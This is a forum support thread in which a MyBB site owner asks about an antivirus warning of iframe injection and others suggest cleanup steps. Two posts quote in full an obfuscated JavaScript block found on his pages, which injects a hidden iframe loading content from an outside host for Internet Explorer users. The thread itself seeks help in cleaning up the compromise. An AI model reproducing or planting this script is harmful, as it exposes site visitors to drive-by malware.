Thread Rating:
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Not Solved [Security] I think my site just tried to attack me.
#1
Not Solved Exclamation 
Here'd what I got from Norton:
[Image: P6KQN.png]

Can someone tell me what it means? Thanks Allot!
#2
Not Solved
run file verification tool from tools & maintenance section ... see also security vulnerability
#3
Not Solved
I just went to your site, and scanned it with an AVG website scanner thing and nothing is being detected. Run the file verification tool as Ranjani suggested to check if anything has been modified.
Your friendly neighbourhood lurker.
#4
Not Solved
(2011-10-21, 06:08 AM)Joshua Mayer Wrote: I just went to your site, and scanned it with an AVG website scanner thing and nothing is being detected. Run the file verification tool as Ranjani suggested to check if anything has been modified.

It appears all clean, but one of my friends said he got a attempted attack to from my site........... I don't know what it means "Mass Iframe Injection".........
#5
Not Solved
Any clue what this code is at the bottom fo the page?

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'x://A-z.o.D/E.F?t=B\'}}5 2=y.r.q();7(((2.3("p")!=-1&&2.3("s")==-1&&2.3("u")==-1))&&2.3("w")!=-1){5 t=v("9()",C)}',42,42,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|ddns|msie|toLowerCase|userAgent|opera||webtv|setTimeout|windows|http|navigator|secure|certain|68381830|500|info|showthread|php'.split('|'),0,{}))
</script>
-Paul H.

Cogisne lingua latina?
#6
Not Solved
(2011-10-21, 09:15 PM)Paul H. Wrote: Any clue what this code is at the bottom fo the page?

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'x://A-z.o.D/E.F?t=B\'}}5 2=y.r.q();7(((2.3("p")!=-1&&2.3("s")==-1&&2.3("u")==-1))&&2.3("w")!=-1){5 t=v("9()",C)}',42,42,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|ddns|msie|toLowerCase|userAgent|opera||webtv|setTimeout|windows|http|navigator|secure|certain|68381830|500|info|showthread|php'.split('|'),0,{}))
</script>

No, not at all, do you know where I can delete that?


Also, I got a new report from Norton:

[Image: Tmy3I.png]
#7
Not Solved
http://community.mybb.com/thread-106302-...#pid774902
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#8
Not Solved
I already applied the patch......
#9
Not Solved
but did you review the various threads that go over cleaning templates, cleaning config.php and settings.php? what about scanning for other non-MyBB files being added?
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#10
Not Solved
How do I do that? (sorry for being such a noob)
UPDATE: It seems to have something to do with ShowThread.php....


Forum Jump:


Users browsing this thread: 1 Guest(s)